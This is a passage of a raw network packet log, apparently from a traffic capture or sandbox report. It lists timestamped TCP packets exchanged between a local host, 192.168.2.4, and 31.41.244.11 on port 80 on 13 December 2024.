                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.706521034 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.708076954 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.708125114 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.708204985 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.708246946 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.709734917 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.709784985 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.709849119 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.709887028 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.711406946 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.711458921 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.711644888 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.711692095 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.712945938 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.712990999 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.713009119 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.713023901 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.714596987 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.714698076 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.714699984 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.714795113 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.716170073 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.716237068 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.716285944 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.716340065 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.717725039 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.717782974 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.717869043 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.719317913 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.719388008 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.719424009 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.719517946 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.720813036 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.720858097 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.720901966 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.720946074 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.722425938 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.722486019 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.722513914 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.722552061 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.723941088 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.723953009 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.724039078 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.725363016 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.725405931 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.725405931 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.725435972 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.725477934 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.726843119 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.726893902 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.726902008 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.726942062 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.728432894 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.728493929 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.728494883 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.728539944 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.729799986 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.729839087 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.729861975 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.729902029 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.731231928 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.731276989 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.731334925 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.731384993 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.732741117 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.732789040 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.732831955 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.732873917 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.734155893 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.734201908 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.734216928 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.734266996 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.735656023 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.735702038 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.735806942 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.735852003 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.737158060 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.737214088 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.737215996 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.737263918 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.738518000 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.738574028 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.738620043 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.738661051 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.739969969 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.740044117 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.740299940 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.740356922 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.741569042 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.741635084 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.741718054 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.741764069 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.742774963 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.742825031 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.742964983 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.743005037 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.744225025 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.744278908 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.744281054 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.744324923 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.745801926 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.745861053 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.745901108 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.745937109 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.747286081 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.747342110 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.747508049 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.747550964 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.748709917 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.748732090 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.748759985 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.748775005 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.750341892 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.750381947 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.750436068 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.750473022 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.751658916 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.751701117 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.751820087 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.751862049 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.752926111 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.752974987 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.753062963 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.753099918 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.754326105 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.754374981 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.754420042 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.754460096 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.755875111 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.755887985 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.755939960 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.757179022 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.757231951 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.757308960 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.757349968 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.758635044 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.758686066 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.758696079 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.758737087 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.760225058 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.760237932 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.760299921 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.761591911 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.761646032 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.761679888 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.761729002 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.763264894 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.763318062 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.763336897 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.763377905 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.764462948 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.764499903 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.764544964 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.764580011 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.765893936 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.765937090 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.765969038 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.766006947 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.767290115 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.767332077 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.767486095 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.767524004 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.768717051 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.768758059 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.768817902 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.768858910 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.770160913 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.770209074 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.770275116 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.770313978 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.771631002 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.771676064 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.771693945 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.771729946 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.773045063 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.773097038 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.773159981 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.773205042 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.774524927 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.774580956 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.887986898 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.888097048 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.888155937 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.888204098 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.888550043 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.888602972 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.888616085 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.888667107 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.889782906 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.889837027 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.890095949 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.890175104 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.890197039 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.890237093 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.891242027 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.891288042 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.891376972 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.891421080 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.892332077 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.892390013 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.892476082 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.892519951 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.893487930 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.893501997 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.893532991 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.893565893 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.894582987 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.894594908 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.894634008 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.895373106 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.895682096 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.895734072 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.895787001 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.895840883 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.896748066 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.896797895 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.896850109 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.896895885 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.897828102 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.897874117 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.897998095 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.898076057 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.898915052 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.898958921 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.899007082 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.899054050 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.899990082 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.900034904 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.900098085 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.900145054 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.901094913 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.901156902 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.901184082 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.901227951 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.902340889 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.902370930 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.902391911 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.902426004 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.903471947 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.903482914 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.903520107 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.903553009 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.904392004 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.904479980 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.904484034 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.904551983 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.905436993 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.905487061 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.905632019 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.905674934 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.906584978 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.906629086 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.906840086 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.906883001 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.907629967 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.907675028 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.907708883 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.907747984 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.908695936 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.908745050 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.908821106 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.908884048 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.909893990 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.909907103 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.909975052 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.909975052 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.910907030 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.910999060 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.911005020 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.911083937 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.912003040 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.912050962 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.912081003 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.912148952 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.913089991 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.913135052 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:17.913156033 CET804976331.41.244.11192.168.2.4
